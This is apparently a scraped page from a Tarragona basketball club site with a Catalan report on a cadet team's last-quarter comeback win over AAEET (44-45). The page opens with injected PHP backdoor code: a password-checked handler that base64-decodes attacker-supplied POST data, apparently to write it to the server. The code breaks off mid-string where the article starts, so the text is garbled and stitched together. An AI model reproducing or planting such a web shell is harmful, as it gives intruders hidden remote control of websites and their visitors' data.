function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí 1 fa un últim quart de somni i derrota l'AAEET (44-45) - Tgn Bàsquet Club -

El cadet masculí 1 fa un últim quart de somni i derrota l’AAEET (44-45)

Updated: novembre 25, 2015

El cadet masculí 1 va fer un últim període per emmarcar i va vèncer l’AAEET que tenia el partit a la butxaca quan faltaven poc més de dos minuts. Aleshores, el conjunt vallenc dominava per 7 punts de diferència (43-36). Va ser el moment en què el jugador del TGN Bàsquet Josa va fer 7 punts seguits -dos triples inclosos- i els seus companys Areste i Riquelme van culminar la remuntada.

Havia estat un partit difícil perquè al començament de l’últim quart l’AAEET dominava per 14 punts de diferència després d’haver aturat la bona sortida dels tarragonins a l’inici del partit.

Aquesta victòria referma la millora de l’equip que en la primera volta havia perdut al pavelló del Sagrat Cor contra aquest rival per 22 punts de diferència.